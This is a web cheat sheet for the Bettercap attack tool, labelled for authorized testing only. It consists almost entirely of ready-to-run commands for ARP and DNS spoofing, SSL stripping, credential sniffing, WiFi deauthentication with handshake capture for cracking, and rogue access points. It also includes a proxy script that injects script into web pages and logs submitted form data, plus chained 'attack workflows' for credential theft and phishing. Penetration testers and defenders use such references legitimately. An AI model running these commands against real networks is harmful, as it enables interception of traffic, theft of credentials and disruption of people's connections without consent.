โ† All cheat sheets

BETTERCAP

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Swiss army knife for network attacks, MITM, WiFi, BLE, and
HID reconnaissance and exploitation.

INSTALLATION#

sudo apt install bettercap                  # Kali/Debian
brew install bettercap                      # macOS
go install github.com/bettercap/bettercap@latest  # Go

# Start
sudo bettercap
sudo bettercap -iface eth0                  # Specific interface
sudo bettercap -caplet script.cap           # Run caplet

NETWORK DISCOVERY#

net.probe on                                # Active host discovery
net.show                                    # Show discovered hosts
net.recon on                                # Passive recon
net.clear                                   # Clear host list

# Target specific hosts
set arp.spoof.targets 10.10.10.5
set arp.spoof.targets 10.10.10.5,10.10.10.6

ARP SPOOFING (MITM)#

# Full duplex (both directions)
set arp.spoof.fullduplex true
set arp.spoof.targets 10.10.10.5            # Victim IP
arp.spoof on

# Spoof entire subnet
set arp.spoof.targets 10.10.10.0/24
set arp.spoof.fullduplex true
arp.spoof on

# Spoof with internal forwarding
set arp.spoof.internal true                 # Intercept LAN-to-LAN
arp.spoof on

DNS SPOOFING#

set dns.spoof.domains example.com
set dns.spoof.address 10.10.10.100          # Redirect to this IP
set dns.spoof.all true                      # Spoof all domains
dns.spoof on

# Multiple domains
set dns.spoof.domains example.com,login.example.com,*.target.com

HTTP/HTTPS PROXY#

# HTTP proxy (intercept cleartext)
set http.proxy.sslstrip true                # SSL strip
http.proxy on

# HTTPS proxy (requires CA cert)
set https.proxy.sslstrip true
https.proxy on

# Custom proxy script (JavaScript)
set http.proxy.script /path/to/script.js
http.proxy on

# SSL strip
set net.sniff.verbose true
set arp.spoof.targets 10.10.10.5
arp.spoof on
http.proxy on
net.sniff on

SNIFFING#

net.sniff on                                # Start sniffer
set net.sniff.verbose true                  # Verbose output
set net.sniff.output capture.pcap           # Save to file
set net.sniff.filter "tcp port 80"          # BPF filter
set net.sniff.regexp "password|login|user"  # Regex filter
net.sniff off                               # Stop

CREDENTIAL SNIFFING#

# Automatic credential extraction
set net.sniff.verbose true
net.sniff on

# Captures credentials from:
#   HTTP Basic Auth, HTTP POST forms
#   FTP, SMTP, POP3, IMAP
#   Telnet, SNMP
#   NTLMv1/v2 hashes

WIFI ATTACKS#

# Set interface to monitor mode first
sudo bettercap -iface wlan0mon

# WiFi recon
wifi.recon on                               # Scan for APs
wifi.show                                   # Show discovered APs
wifi.recon.channel 1,6,11                   # Specific channels

# Deauthentication
wifi.deauth AP_BSSID                        # Deauth all clients
wifi.deauth CLIENT_MAC                      # Deauth specific client

# WPA handshake capture
set wifi.handshakes.file handshakes/
wifi.recon on
wifi.deauth AP_BSSID                        # Force reconnection
# Handshake saved to file โ†’ crack with aircrack/hashcat

# Evil twin
wifi.ap on                                  # Start rogue AP

BLE (BLUETOOTH LOW ENERGY)#

ble.recon on                                # Scan BLE devices
ble.show                                    # Show discovered devices
ble.enum DEVICE_MAC                         # Enumerate services
ble.write DEVICE_MAC UUID DATA              # Write to characteristic

CAPLETS (SCRIPTS)#

# Caplets are automation scripts (.cap files)

# Run caplet
sudo bettercap -caplet http-ui              # Web UI
sudo bettercap -caplet https-ui             # HTTPS Web UI
sudo bettercap -caplet pita                 # ARP spoof + sniff

# Custom caplet example (mitm.cap):
set arp.spoof.fullduplex true
set arp.spoof.targets 10.10.10.5
set net.sniff.verbose true
set net.sniff.output /tmp/capture.pcap
net.probe on
arp.spoof on
net.sniff on
http.proxy on

# Run: sudo bettercap -caplet mitm.cap

WEB UI#

# Start with web interface
sudo bettercap -caplet https-ui

# Or manually
set api.rest.address 0.0.0.0
set api.rest.port 8083
set api.rest.username admin
set api.rest.password password
api.rest on
# Access: https://127.0.0.1:8083

PROXY SCRIPTS (JAVASCRIPT)#

// Inject content into HTTP responses
function onResponse(req, res) {
    if (res.ContentType.indexOf('text/html') == 0) {
        var body = res.ReadBody();
        res.Body = body.replace('</head>',
            '<script>alert("injected")</script></head>');
    }
}

// Log POST data
function onRequest(req, res) {
    if (req.Method == "POST") {
        log("POST " + req.Hostname + req.Path +
            " | Body: " + req.ReadBody());
    }
}

COMMON ATTACK WORKFLOWS#

# 1. MITM + credential capture
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.10.10.0/24
arp.spoof on
net.sniff on

# 2. DNS spoofing + phishing
set arp.spoof.targets 10.10.10.5
arp.spoof on
set dns.spoof.domains login.company.com
set dns.spoof.address 10.10.10.100
dns.spoof on

# 3. SSL stripping
set arp.spoof.targets 10.10.10.5
arp.spoof on
set http.proxy.sslstrip true
http.proxy on
net.sniff on

# 4. WiFi handshake capture
wifi.recon on
# Wait for target AP
wifi.deauth TARGET_BSSID
# Check handshakes/ directory

TIPS#

  - Use fullduplex for reliable MITM
  - Caplets automate complex attack chains
  - Web UI provides visual network map
  - WiFi attacks require monitor mode interface
  - net.probe actively discovers all hosts on subnet
  - Proxy scripts enable real-time traffic manipulation
  - BLE recon useful for IoT pentesting
  - HSTS prevents SSL stripping on modern sites
  - Save captures for offline analysis in Wireshark
  - Run net.probe before arp.spoof for target discovery